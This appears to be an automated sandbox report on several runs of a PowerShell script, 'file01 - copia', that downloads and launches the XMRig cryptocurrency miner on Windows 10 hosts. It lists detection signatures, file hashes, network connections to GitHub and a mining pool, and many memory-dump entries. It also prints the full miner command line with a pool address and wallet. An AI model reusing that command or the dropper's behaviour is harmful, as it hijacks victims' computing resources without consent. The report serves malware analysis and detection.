N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2632-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzpaizjq.15c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2632-9-0x000001BA3F570000-0x000001BA3F592000-memory.dmp

memory/2632-10-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-14-0x000001BA3F690000-0x000001BA3F6A2000-memory.dmp

memory/2632-15-0x000001BA3F680000-0x000001BA3F68A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1028-46-0x0000026FDFC50000-0x0000026FDFC70000-memory.dmp

memory/1028-47-0x0000026FDFCA0000-0x0000026FDFCC0000-memory.dmp

memory/1028-48-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/2632-49-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

memory/2632-50-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/1028-51-0x0000026FE1570000-0x0000026FE1590000-memory.dmp

memory/1028-52-0x0000026FE1590000-0x0000026FE15B0000-memory.dmp

memory/1028-53-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-54-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-56-0x0000026FE1570000-0x0000026FE1590000-memory.dmp

memory/1028-55-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-57-0x0000026FE1590000-0x0000026FE15B0000-memory.dmp

memory/1028-58-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-59-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-60-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-61-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-62-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-63-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-64-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-65-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-66-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-67-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-68-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-69-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-70-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-71-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-72-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-73-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-74-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-75-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-76-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-77-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-78-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-79-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-80-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-81-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-82-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-83-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-84-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-85-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-86-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-87-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-88-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-89-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-90-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-91-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-92-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-93-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-94-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-95-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-96-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-97-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-98-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-99-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-100-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-101-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-102-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-103-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-104-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-105-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-106-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-107-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-108-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-109-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-110-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-111-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-112-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-113-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-114-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-115-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

memory/1028-116-0x00007FF768DD0000-0x00007FF769A03000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:19

Platform

win7-20240508-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

memory/2108-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2108-5-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2108-6-0x00000000021E0000-0x00000000021E8000-memory.dmp

memory/2108-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2108-8-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2108-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2108-10-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2108-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2108-12-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:26

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2044-4-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp

memory/2044-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2044-6-0x0000000002850000-0x0000000002858000-memory.dmp

memory/2044-7-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2044-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2044-10-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2044-9-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2044-11-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

memory/972-0-0x00007FFC9B8F3000-0x00007FFC9B8F5000-memory.dmp

memory/972-6-0x0000024EBE330000-0x0000024EBE352000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcj4zlmi.1yi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/972-11-0x00007FFC9B8F0000-0x00007FFC9C3B1000-memory.dmp

memory/972-12-0x00007FFC9B8F0000-0x00007FFC9C3B1000-memory.dmp

memory/972-14-0x00007FFC9B8F0000-0x00007FFC9C3B1000-memory.dmp

memory/972-15-0x0000024EBD6A0000-0x0000024EBD6B2000-memory.dmp

memory/972-16-0x0000024EBD680000-0x0000024EBD68A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5032-47-0x000002343CD60000-0x000002343CD80000-memory.dmp

memory/5032-48-0x000002343E7A0000-0x000002343E7C0000-memory.dmp

memory/5032-49-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-53-0x000002343E7E0000-0x000002343E800000-memory.dmp

memory/5032-52-0x000002343E7C0000-0x000002343E7E0000-memory.dmp

memory/972-51-0x00007FFC9B8F3000-0x00007FFC9B8F5000-memory.dmp

memory/5032-50-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/972-54-0x00007FFC9B8F0000-0x00007FFC9C3B1000-memory.dmp

memory/5032-55-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-56-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-57-0x000002343E7C0000-0x000002343E7E0000-memory.dmp

memory/5032-58-0x000002343E7E0000-0x000002343E800000-memory.dmp

memory/5032-59-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-60-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-61-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-62-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-63-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-64-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-65-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-66-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-67-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-68-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-69-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-70-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-71-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-72-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-73-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-74-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-75-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-76-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-77-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-78-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-79-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-80-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-81-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-82-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-83-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-84-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-85-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-86-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-87-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-88-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-89-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-90-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-91-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-92-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-93-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-94-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-95-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-96-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-97-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-98-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-99-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-100-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-101-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-102-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-103-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-104-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-105-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-106-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-107-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-108-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-109-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-110-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-111-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-112-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-113-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-114-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-115-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-116-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

memory/5032-117-0x00007FF65BFA0000-0x00007FF65CBD3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Network

N/A

Files

memory/2084-4-0x000007FEF5C6E000-0x000007FEF5C6F000-memory.dmp

memory/2084-6-0x0000000002870000-0x0000000002878000-memory.dmp

memory/2084-7-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

memory/2084-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/2084-9-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

memory/2084-8-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

memory/2084-10-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

memory/2084-11-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

memory/2084-12-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:44

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
